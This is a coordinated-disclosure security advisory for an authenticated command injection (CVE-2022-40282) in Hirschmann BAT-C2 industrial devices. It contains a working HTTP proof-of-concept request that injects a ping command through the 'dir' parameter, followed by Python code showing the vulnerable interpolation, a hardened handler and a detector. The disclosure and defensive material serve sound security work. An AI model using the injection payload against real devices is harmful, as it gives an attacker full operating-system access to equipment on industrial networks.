[EN] Authenticated Command Injection in Hirschmann (Belden) BAT-C2

Title: Multiple Critical Vulnerabilities
Product: Hirschmann (Belden) BAT-C2
Vulnerable version: 8.8.1.0R8
Fixed version: 09.13.01.00R04
CVE: CVE-2022-40282
Impact: High
Homepage: https://hirschmann.com/ | https://beldensolutions.com
Found: 2022-08-01


Hirschmann BAT-C2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

Vendor description

“The Technology and Market Leader in Industrial Networking. Hirschmann™ develops innovative solutions, which are geared towards its customers’ requirements in terms of performance, efficiency and investment reliability.”

Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtml

Vulnerable versions

Hirschmann (Belden) BAT-C2

Vulnerability overview

1) Authenticated Command Injection
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device, with all the implications that entails. If such a device acts as a key device in an industrial network, or controls critical equipment via its serial ports, an attacker can cause far more extensive damage in the corresponding network.

Proof of Concept

1) Authenticated Command Injection

The command “ping 192.168.1.1” was injected into the system via the `dir` parameter of the following POST request:

POST / HTTP/1.1
Host: 192.168.3.150
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d"
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
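The PoC body above shows the classic shape of this bug class: the `dir` value is URL-decoded to `';ping 192.168.1.1;'`, where the leading and trailing quote close and reopen a single-quoted shell argument, so whatever sits between them runs as its own command. The following Python is an added example written for this advisory, not code from the BAT-C2 firmware or from CyberDanube. It contrasts the string-interpolation anti-pattern (rendered, never executed) with a hardened handler that validates the name against an allowlist, confines it to a root directory and creates it with a library call instead of a shell, and it includes a small detector that flags form bodies carrying shell metacharacters. The function names, the `mkdir '<dir>'` command shape and the sample request bodies are assumptions; the PoC body is copied from the request above.

```python
"""Hardened handling of a form parameter such as `dir`, plus a detector for the
injection pattern shown in the advisory.  Added example; not the BAT-C2 code.
Function names, the assumed `mkdir '<dir>'` command shape and the sample
request bodies are constructed for illustration."""
import os
import re
import tempfile
from urllib.parse import parse_qs

# Allowlist for a directory name: letters, digits, dot, underscore, dash.
# No path separators and no shell metacharacters can pass this check.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Characters that carry meaning for /bin/sh when a value is glued into a command line.
SHELL_META = re.compile(r"[;&|`$()<>\n'\"\\]")


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_command(form: dict) -> str:
    """The anti-pattern (assumed shape): quote the value and interpolate it into a
    shell command.  Returned as a string, never executed, so the effect of the
    payload's surrounding quotes can be inspected safely."""
    return f"mkdir '{form.get('dir', '')}'"


def create_dir(root: str, form: dict) -> str:
    """Hardened handler: allowlist the name, confine the result to `root`, and
    create the directory with os.makedirs so no shell is ever involved."""
    name = form.get("dir", "")
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected directory name: {name!r}")
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, name))
    if os.path.commonpath([target, real_root]) != real_root:
        raise ValueError("path escapes root")
    os.makedirs(target, exist_ok=False)
    return target


def handle_in_tempdir(body: str) -> str:
    """Run the hardened handler on a request body inside a throwaway root.
    Returns 'created' or 'rejected' so the outcome is easy to check."""
    with tempfile.TemporaryDirectory() as root:
        try:
            create_dir(root, parse_form(body))
            return "created"
        except ValueError:
            return "rejected"


def flag_request(body: str) -> list:
    """Detection: list parameters whose decoded value contains shell metacharacters.
    Suitable as a WAF or log-review rule for the FsCreateDir request shape."""
    findings = []
    for name, value in parse_form(body).items():
        if SHELL_META.search(value):
            findings.append(f"{name}={value!r}")
    return findings


# Constructed sample bodies: the first mirrors the advisory's PoC, the second is benign.
POC_BODY = "ajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/"
BENIGN_BODY = "ajax=FsCreateDir&dir=logs&iehack=&submit=Create&cwd=/"

if __name__ == "__main__":
    print("decoded dir:", parse_form(POC_BODY)["dir"])
    print("interpolated command:", vulnerable_command(parse_form(POC_BODY)))
    print("flags:", flag_request(POC_BODY), flag_request(BENIGN_BODY))
    print("hardened handler:", handle_in_tempdir(BENIGN_BODY), handle_in_tempdir(POC_BODY))
```

Rendering the interpolated command makes the mechanism visible: the quoted argument becomes `mkdir '';ping 192.168.1.1;''`, three separate shell commands. The hardened handler rejects the same body before any filesystem call, and the allowlist also rules out traversal names such as `../etc` without needing a second check.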

Solution

Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

Workaround

None

Recommendation

CyberDanube recommends that Hirschmann customers upgrade the firmware to the latest available version. Furthermore, a full security review by professionals is recommended.


References

Contact Timeline

  • 2022-08-03: Contacting Hirschmann via ; Belden contact suspects a duplicate. Asked contact for more information.
  • 2022-08-18: Belden representative sent more information for clarification. Highlighted differences between PoCs.
  • 2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
  • 2022-08-30: Asked for an update.
  • 2022-08-31: Vendor stated that they will release another security bulletin for this vulnerability.
  • 2022-09-27: Asked for an update.
  • 2022-09-28: Vendor is currently testing the new firmware version and has also been assigned a CVE number. A draft of the security bulletin was also sent by the security contact.
  • 2022-10-12: Asked for an update.
  • 2022-10-13: Belden contact stated that there is no publication date for now, as another patch must be integrated.
  • 2022-10-28: Security contact informed us that the patch will be released within the next two weeks.
  • 2022-11-22: Asked for a status update; security contact stated that the release was delayed due to internal reasons.
  • 2022-11-23: Vendor sent the final version of the security bulletins. The release of the new firmware version will be 2022-11-28.
  • 2022-11-24: Vendor informed CyberDanube that the release of the bulletin and the firmware was done on 2022-11-23 by the marketing team. Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM (international). Nowadays, he brings his competence and experience into security products.